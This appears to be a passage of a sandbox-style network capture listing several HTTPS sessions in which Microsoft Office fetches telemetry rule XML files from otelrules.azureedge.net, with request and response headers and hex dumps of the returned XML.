                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:40 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        107192.168.2.54981713.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:39 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:40 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:40 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1354
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 792e95e0-001e-0065-4da8-340b73000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142540Z-r178fb8d7654njfdhC1DFWd04800000002h000000000f4az
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:40 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        108192.168.2.54981813.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:40 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:40 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:40 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 4df37937-b01e-003d-35ab-2bd32c000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142540Z-16547b76f7fp6mhthC1DFWrggn0000000kz0000000001ex2
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:40 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        109192.168.2.54981513.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:40 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:40 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:40 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1364
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 3018dbe1-101e-008d-70d2-2c92e5000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142540Z-16547b76f7f76p6chC1DFWctqw0000000ktg00000000gf52
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:40 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        110192.168.2.54981913.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:40 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:40 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:40 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 510f214b-601e-0050-22a5-342c9c000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142540Z-1749fc9bdbd9f5rdhC1DFWbers00000002vg000000000bxw
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:40 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        111192.168.2.54982013.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:40 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:40 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:40 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1399
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 5b14ddc3-301e-0033-2bd2-2cfa9c000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142540Z-16547b76f7fcjqqhhC1DFWrrrc0000000kng00000000kaw2
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:40 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        112192.168.2.54982113.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:40 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:41 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:40 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1362
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDF497570"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 9890a075-d01e-002b-06d2-2c25fb000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142540Z-16547b76f7fr4g8xhC1DFW9cqc0000000hzg000000008p3t
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:41 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        113192.168.2.54982213.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:40 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:41 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: e1b64052-701e-003e-45a3-3479b3000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142541Z-r178fb8d765mjvjchC1DFWhkyn00000002n0000000000sd4
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:41 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        114192.168.2.54982313.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:41 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:41 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:41 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BEA414B16"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 59bb3ce9-601e-0097-63c3-2bf33a000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142541Z-16547b76f7f8dwtrhC1DFWd1zn0000000kyg0000000032b3
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
